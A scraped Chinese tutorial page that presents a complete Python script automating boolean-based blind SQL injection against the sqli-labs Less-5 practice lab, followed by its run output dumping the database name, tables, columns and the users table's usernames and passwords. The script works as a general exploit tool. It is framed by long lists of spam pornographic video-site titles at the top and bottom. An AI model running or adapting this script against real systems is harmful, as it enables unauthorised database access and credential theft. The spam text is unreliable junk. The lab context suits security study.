成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁 > 知識庫 > python實現(xiàn)布爾型盲注的示例代碼

python實現(xiàn)布爾型盲注的示例代碼

熱門標簽:房產(chǎn)電銷外呼系統(tǒng) 地圖制圖標注位置改變是移位嗎 地圖標注微信發(fā)送位置不顯示 浙江電銷卡外呼系統(tǒng)好用嗎 上海機器人外呼系統(tǒng)哪家好 315電話機器人廣告 地圖標注的意義點 蓋州市地圖標注 南京銷售外呼系統(tǒng)軟件

好久沒寫python了,就想著寫個簡單的練練手,寫個布爾型盲注自動化腳本,我覺得這個功能寫的非常全了,這里是參考sqli-labs里面的盲注漏洞進行的腳本編寫。

腳本運行時間:6分半左右

bool_sqlblind.py
# -*- coding:utf-8 -*-
# Author: mochu7
import requests

def ascii_str():#生成庫名表名字符所在的字符列表字典
 str_list=[]
 for i in range(33,127):#所有可顯示字符
  str_list.append(chr(i))
 #print('可顯示字符:%s'%str_list)
 return str_list#返回字符列表

def db_length(url,str):
 print("[-]開始測試數(shù)據(jù)庫名長度.......")
 num=1
 while True:
  db_payload=url+"' and (length(database())=%d)--+"%num
  r=requests.get(db_payload)
  if str in r.text:
   db_length=num
   print("[+]數(shù)據(jù)庫長度:%d\n"%db_length)
   db_name(db_length)#進行下一步,測試庫名
   break
  else:
   num += 1

def db_name(db_length):
 print("[-]開始測試數(shù)據(jù)庫名.......")
 db_name=''
 str_list=ascii_str()
 for i in range(1,db_length+1):
  for j in str_list:
   db_payload=url+"' and (ord(mid(database(),%d,1))='%s')--+"%(i,ord(j))
   r=requests.get(db_payload)
   if str in r.text:
    db_name+=j
    break
 print("[+]數(shù)據(jù)庫名:%s\n"%db_name)
 tb_piece(db_name)#進行下一步,測試security數(shù)據(jù)庫有幾張表
 return db_name
 
def tb_piece(db_name):
 print("開始測試%s數(shù)據(jù)庫有幾張表........"%db_name)
 for i in range(100):#猜解庫中有多少張表,合理范圍即可
  tb_payload=url+"' and %d=(select count(table_name) from information_schema.tables where table_schema='%s')--+"%(i,db_name)
  r=requests.get(tb_payload)
  if str in r.text:
   tb_piece=i
   break
 print("[+]%s庫一共有%d張表\n"%(db_name,tb_piece))
 tb_name(db_name,tb_piece)#進行下一步,猜解表名


def tb_name(db_name,tb_piece):
 print("[-]開始猜解表名.......")
 table_list=[]
 for i in range(tb_piece):
  str_list=ascii_str()
  tb_length=0
  tb_name=''
  for j in range(1,20):#表名長度,合理范圍即可
   tb_payload=url+"' and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+"%(i,j)
   r=requests.get(tb_payload)
   if str in r.text:
    tb_length=j
    print("第%d張表名長度:%s"%(i+1,tb_length))
    for k in range(1,tb_length+1):#根據(jù)表名長度進行截取對比
     for l in str_list:
      tb_payload=url+"' and (select ord(mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%d--+"%(i,k,ord(l))
      r=requests.get(tb_payload)
      if str in r.text:
       tb_name+=l
    print("[+]:%s"%tb_name)
    table_list.append(tb_name)
    break
 print("\n[+]%s庫下的%s張表:%s\n"%(db_name,tb_piece,table_list))
 column_num(table_list,db_name)#進行下一步,猜解每張表的字段數(shù)

def column_num(table_list,db_name):
 print("[-]開始猜解每張表的字段數(shù):.......")
 column_num_list=[]
 for i in table_list:
  for j in range(30):#每張表的字段數(shù)量,合理范圍即可
   column_payload=url+"' and %d=(select count(column_name) from information_schema.columns where table_name='%s')--+"%(j,i)
   r=requests.get(column_payload)
   if str in r.text:
    column_num=j
    column_num_list.append(column_num)#把所有表的字段,依次放入這個列表當中
    print("[+]%s表\t%s個字段"%(i,column_num))
    break
 print("\n[+]表對應的字段數(shù):%s\n"%column_num_list)
 column_name(table_list,column_num_list,db_name)#進行下一步,猜解每張表的字段名

def column_name(table_list,column_num_list,db_name):
 print("[-]開始猜解每張表的字段名.......")
 column_length=[]
 str_list=ascii_str()
 column_name_list=[]
 for t in range(len(table_list)):#t在這里代表每張表的列表索引位置
  print("\n[+]%s表的字段:"%table_list[t])
  for i in range(column_num_list[t]):#i表示每張表的字段數(shù)量
   column_name=''
   for j in range(1,21):#j表示每個字段的長度
    column_name_length=url+"' and %d=(select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)--+"%(j-1,table_list[t],i)
    r=requests.get(column_name_length)
    if str in r.text:
     column_length.append(j)
     break
    for k in str_list:#k表示我們猜解的字符字典
     column_payload=url+"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d--+"%(table_list[t],i,j,ord(k))
     r=requests.get(column_payload)
     if str in r.text:
      column_name+=k
   print('[+]:%s'%column_name)
   column_name_list.append(column_name)
 #print(column_name_list)#輸出所有表中的字段名到一個列表中
 dump_data(table_list,column_name_list,db_name)#進行最后一步,輸出指定字段的數(shù)據(jù)

def dump_data(table_list,column_name_list,db_name):
 print("\n[-]對%s表的%s字段進行爆破.......\n"%(table_list[3],column_name_list[9:12]))
 str_list=ascii_str()
 for i in column_name_list[9:12]:#id,username,password字段
  for j in range(101):#j表示有多少條數(shù)據(jù),合理范圍即可
   data_num_payload=url+"' and (select count(%s) from %s.%s)=%d--+"%(i,db_name,table_list[3],j)
   r=requests.get(data_num_payload)
   if str in r.text:
    data_num=j
    break
  print("\n[+]%s表中的%s字段有以下%s條數(shù)據(jù):"%(table_list[3],i,data_num))
  for k in range(data_num):
   data_len=0
   dump_data=''
   for l in range(1,21):#l表示每條數(shù)據(jù)的長度,合理范圍即可
    data_len_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+"%(i,db_name,table_list[3],k,l)
    r=requests.get(data_len_payload)
    if str not in r.text:
     data_len=l-1
     for x in range(1,data_len+1):#x表示每條數(shù)據(jù)的實際范圍,作為mid截取的范圍
      for y in str_list:
       data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d--+"%(i,db_name,table_list[3],k,x,ord(y))
       r=requests.get(data_payload)
       if str in r.text:
        dump_data+=y
        break
     break
   print('[+]%s'%dump_data)#輸出每條數(shù)據(jù)



if __name__ == '__main__':
 url="http://127.0.0.1/sqli-labs/Less-5/?id=1"#目標url
 str="You are in"#布爾型盲注的truefalse的判斷因素
 db_length(url,str)#程序入口

運行結果

PS C:\Users\Administrator\Desktop> python3 .\bool_sqlblind.py                                                                                                                                                                                [-]開始測試數(shù)據(jù)庫名長度.......
[+]數(shù)據(jù)庫長度:8

[-]開始測試數(shù)據(jù)庫名.......
[+]數(shù)據(jù)庫名:security

開始測試security數(shù)據(jù)庫有幾張表........
[+]security庫一共有4張表

[-]開始猜解表名.......
第1張表名長度:6
[+]:emails
第2張表名長度:8
[+]:referers
第3張表名長度:7
[+]:uagents
第4張表名長度:5
[+]:users

[+]security庫下的4張表:['emails', 'referers', 'uagents', 'users']

[-]開始猜解每張表的字段數(shù):.......
[+]emails表     2個字段
[+]referers表   3個字段
[+]uagents表    4個字段
[+]users表      7個字段

[+]表對應的字段數(shù):[2, 3, 4, 7]

[-]開始猜解每張表的字段名.......

[+]emails表的字段:
[+]:id
[+]:email_id

[+]referers表的字段:
[+]:id
[+]:referer
[+]:ip_address

[+]uagents表的字段:
[+]:id
[+]:uagent
[+]:ip_address
[+]:username

[+]users表的字段:
[+]:id
[+]:username
[+]:password
[+]:level
[+]:id
[+]:username
[+]:password

[-]對users表的['id', 'username', 'password']字段進行爆破.......


[+]users表中的id字段有以下13條數(shù)據(jù):
[+]1
[+]2
[+]3
[+]4
[+]5
[+]6
[+]7
[+]8
[+]9
[+]10
[+]11
[+]12
[+]14

[+]users表中的username字段有以下13條數(shù)據(jù):
[+]Dumb
[+]Angelina
[+]Dummy
[+]secure
[+]stupid
[+]superman
[+]batman
[+]admin
[+]admin1
[+]admin2
[+]admin3
[+]dhakkan
[+]admin4

[+]users表中的password字段有以下13條數(shù)據(jù):
[+]Dumb
[+]I-kill-you
[+]p@ssword
[+]crappy
[+]stupidity
[+]genious
[+]mob!le
[+]admin
[+]admin1
[+]admin2
[+]admin3
[+]dumbo
[+]admin4
PS C:\Users\Administrator\Desktop> 

到此這篇關于python實現(xiàn)布爾型盲注的示例代碼的文章就介紹到這了,更多相關python布爾盲注內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • 在python中對于bool布爾值的取反操作
  • python argparse傳入布爾參數(shù)false不生效的解決
  • 速記Python布爾值
  • Python整型運算之布爾型、標準整型、長整型操作示例
  • python 布爾操作實現(xiàn)代碼

標簽:貴州 日照 臨汾 金華 赤峰 克拉瑪依 陽泉 雙鴨山

巨人網(wǎng)絡通訊聲明:本文標題《python實現(xiàn)布爾型盲注的示例代碼》,本文關鍵詞  python,實現(xiàn),布爾型,盲注,;如發(fā)現(xiàn)本文內(nèi)容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《python實現(xiàn)布爾型盲注的示例代碼》相關的同類信息!
  • 本頁收集關于python實現(xiàn)布爾型盲注的示例代碼的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    99久久精品国产一区二区成人| 日韩一区二区免费电影| 国内精品久久久久久中文字幕| 国产在线精品成人一区二区三区| 欧美夫妻性生活视频| 国产精品调教| 国产成人精品aa毛片| 国产成人在线一区二区| 啦啦啦啦免费高清视频在线观看1| 欧美日韩在线观看一区| 日韩欧美影院| 免费观看一二区视频网站| 97超碰在线资源| 97超碰在线资源| 欧美洲成人男女午夜视频| 性感美女一区二区三区| 欧美日韩国产高清一区二区| 制服视频三区第一页精品| 亚洲第一区av| 色综合免费视频| 成人福利视频网站| 狠狠干在线视频| 日韩精品中文字幕在线观看| 粉嫩一区二区三区性色av| 中文字幕无线码| 99精品欧美一区二区| 日韩欧美综合一区| 成人一区而且| 草久视频在线观看| 精品网站www| 日本高清久久一区二区三区| 国产丝袜不卡| 国产一区二区导航在线播放| 色综合久久久无码中文字幕波多| 欧美在线观看一区二区三区| 日本性高潮视频| 6080成人| 久久免费视频这里只有精品| 色综久久综合桃花网| 国产一级特黄aaa大片| 国产午夜一区| 欧美三区免费完整视频在线观看| 亚洲天堂福利av| 欧美成人一区二区三区四区| 欧美办公室脚交xxxx| 国产日韩视频一区| 伊人久久大香线蕉综合影院首页| 日本成址在线观看| 国产99久久精品一区二区| 日韩欧美久久一区| 日韩电影在线免费| 日韩欧美精品在线| 亚洲国产精品成人| 国内福利写真片视频在线| 高清av电影在线观看| 欧美 日韩 国产 一区| 亚洲一区二区三区视频在线| 成人网在线免费看| 日本女优爱爱视频| 日韩女优av电影| 日韩av高清在线看片| 亚洲免费成人在线| 欧美一级欧美一级在线播放| 欧美在线观看视频网站| 亚洲国产视频一区二区三区| 国产性生活网站| 亚洲丝袜在线观看| 国产视频手机在线| 欧美另类高清videos的特点| 黄页网站大全在线免费观看| 久草在线资源站资源站| 午夜爽爽视频| 五月香视频在线观看| 欧美日韩亚洲一区二区三区| 婷婷色一区二区三区| 丰满少妇高潮在线观看| 国产精品理论在线观看| 久操av在线| 欧美日韩久久| 91popny丨九色丨国产| 久久婷婷五月综合色丁香| 精品国产精品久久一区免费式| 狠狠做深爱婷婷综合一区| 日韩精品久久久免费观看| 欧美日韩xxxx| 久久综合在线观看| 中文字幕永久在线观看| 拍真实国产伦偷精品| 在线观看h网| 日本高清免费在线视频| 亚洲一级特黄毛片| 中文字幕免费精品一区高清| 亚洲aaa精品| 四虎成人影院网址| 午夜精品一二三区| а√最新版地址在线天堂| 欧美精品一本久久男人的天堂| 亚洲妇熟xxxx妇色黄| 91日韩中文字幕| 在线视频国内一区二区| 欧美一区二三区| 久久蜜桃资源一区二区老牛| 18毛片免费看| 狠狠干视频网站| 免费观看欧美大片| 亚洲国产一区二区在线播放| 亚洲中国色老太| 久久亚洲精品国产| 在线观看美女网站大全免费| 久久99九九99精品| 蜜桃av鲁一鲁一鲁一鲁俄罗斯的| 日韩欧美激情视频| 中文字幕在线观看二区| 美女免费黄视频网站| 91丝袜在线观看| 天天av天天翘天天综合网色鬼国产| 亚洲色图在线播放| 色婷婷视频在线观看| 国产高潮视频在线观看| 91亚洲视频在线观看| 国产成人综合av| 性欧美videos粗暴| 久久精品人人做人人综合| 亚洲欧洲国产视频| 国产精品三区www17con| 国产色综合一区二区三区| 日韩精品视频播放| 亚洲成av人片在线观看无码| 亚洲一区视频在线观看视频| 在线观看视频你懂得| 在线观看的日韩av| 久久久久久久波多野高潮日日| 91精品国产色综合久久不卡98口| 99视频在线播放| 精品亚洲永久免费精品| 欧美影院精品| 丰满女人性猛交| 亚洲成色精品| 在线免费av一区| 久久综合电影一区| 日韩一区二区三区高清| 午夜羞羞小视频在线观看| 青青青爽久久午夜综合久久午夜| 91视频国产高清| 激情亚洲一区二区三区四区| 欧美日本成人| 国产一区二区三区四区五区六区| 中出视频在线观看| 欧美成人精品一区二区男人小说| 欧美日韩一区二区三区四区五区| 欧美bbbbbbbbbbbb精品| 亚洲国产三级在线| 欧美成人国产| 中文幕一区二区三区久久蜜桃| 可以在线观看的av网站| 在线观看网站免费入口在线观看国内| 欧美一区二区三区思思人| 国产97免费视| 91免费精品国偷自产在线在线| 欧美日日夜夜| 亚洲欧洲一区二区三区在线观看| 69久久精品无码一区二区| 国产精品免费播放| 成人h动漫精品一区| 国产精品全国免费观看高清| 国产不卡在线播放| 国产大陆a不卡| 战狼4完整免费观看在线播放版| 国产成人1区| 午夜毛片在线| 欧美成人免费网| 98精品国产高清在线xxxx天堂| 国产日韩欧美高清| 日本韩国在线视频爽| 国产日本欧美一区二区三区在线| 日日夜夜精品网站| 欧美激情精品久久久六区热门| 亚洲国产日韩欧美在线| 久热中文字幕精品视频在线| 亚洲精品在线网站| 日韩精品欧美激情| 国产精品久久久久久9999| 日韩电影网1区2区| 日本xxxx免费| 69av视频在线| 欧美精品国产精品久久久| 欧美日韩成人综合天天影院| 亚洲精品视频三区| mm1313亚洲国产精品美女| 亚洲精品乱码久久久久久蜜桃图片| 中文字幕 人妻熟女| 亚洲国产欧美一区二区三区同亚洲| 精品国内一区二区三区免费视频| 91国产精品成人| 亚洲精品无码专区| 欧美日韩国产中文字幕在线| 性一交一乱一精一晶| 伊人春色在线| 亚洲欧美日本在线观看| 久久99热狠狠色一区二区| 给个网站可以在线观看你懂的| 国产一区二区不卡视频| 久久视频国产精品免费视频在线| 久久激情五月激情| 蜜臀av午夜一区二区三区| 久久丁香综合五月国产三级网站| 国产精品主播直播| 绯色av一区二区| 国产精品99久久久精品无码| 怡红院男人的天堂| 林ゆな中文字幕一区二区| av成人免费在线观看| 中文字幕不卡在线播放| 91香蕉视频导航| 欧美日韩精品一区| 国产精华一区| 国产综合色视频| 《视频一区视频二区| 国产一级在线观看视频| 日韩一区日韩二区| 久久激情五月丁香伊人| 国产成人精品一区二区三区免费| 中文字幕在线观看| 欧美日韩免费观看一区=区三区| 后入内射无码人妻一区| 国产精品无遮挡| 国产浴室偷窥在线播放| 少妇高潮一区二区三区69| 国产美女www爽爽爽视频| 99精品国产九九国产精品| 欧美国产一级片| 国产精品不卡一区二区三区| 国产精选一区二区三区不卡催乳| 日韩欧美一区二区在线视频| 欧美日韩视频一区二区| 亚洲欧美在线综合| 国产精品夜色7777狼人| 午夜精品久久久久久久男人的天堂| 亚洲中文无码av在线| 久久综合色一综合色88| 中文字幕在线一区| 成人ssswww在线播放| 欧美一区2区三区4区公司二百| 蜜桃av色综合| 色综合久久久久久久久久久| 天堂av在线免费| 天堂成人娱乐在线视频免费播放网站| 午夜在线精品偷拍| 91国偷自产一区二区三区成为亚洲经典| 免费国产一区二区| 国产一区二区在线播放| 亚洲免费网站在线观看| 97人妻人人揉人人躁人人| 欧美在线观看一区二区| 国产精品狼人久久影院观看方式| 免费a级观看| 国产精品久久久久影院老司| 精品美女在线观看视频在线观看| 日本一卡2卡三卡4卡网站| 免费全黄无遮挡裸体毛片| 色香色香欲天天天影视综合网| 99久久99热久久精品免费看| 国产午夜视频在线播放| 久久综合加勒比| 亚洲精品国产精品乱码不卡| www亚洲国产| 精品无吗乱吗av国产爱色| 免费观看av网站| 91丨九色丨海角社区| 精品免费视频.| 成a人片国产精品| 国产精品流白浆视频| 热99精品只有里视频精品| 美女久久久精品| 欧美激情成人在线| 国产 日韩 欧美| 亚洲伊人色欲综合网| 日韩成人av在线资源| 免费观看四虎精品成人| 欧美高清你懂的| 欧美日韩在线直播| 婷婷久久国产对白刺激五月99| 中文av一区二区| 91老司机福利 在线| 再深点灬舒服灬太大了少妇| 青青草原亚洲| 国产午夜精品视频一区二区三区| 亚洲熟女一区二区| caoporen国产精品| 欧洲成人午夜免费大片| 日韩在线一区二区三区| 免费观看亚洲视频大全| 色综合天天色综合| 国产免费电影网站入口| 成人黄色三级视频| 精品卡一卡卡2卡3网站| 欧洲美女和动交zoz0z| 中文字幕中文乱码欧美一区二区| 午夜成在线www| 久久精品观看| 国产成人自拍偷拍| 国产乱码精品一区二区亚洲| 欧美日韩亚洲综合一区| 国产精品午夜一区二区欲梦| 日本r级电影在线观看| 精品五月天久久| 全部孕妇毛片丰满孕妇孕交| 97超碰青青草| 中文字幕成人在线观看| 国精品人妻无码一区二区三区喝尿| 国产成人精品国内自产拍免费看| 欧美人与牲动交xxxx| 欧美艳星介绍134位艳星| 日韩高清国产一区在线观看| www.xxx黄| 亚洲美女色播| 日本japanese极品少妇| 午夜精品亚洲一区二区三区嫩草| 欧美日韩成人免费观看| 成人3d动漫一区二区三区91| 99re6这里只有精品视频在线观看| 国产成人永久免费视频| 成人亚洲欧美激情在线电影| 日本一本在线免费福利| 久热免费在线视频| 国产精品7m视频| 99视频在线精品| 麻豆国产va免费精品高清在线|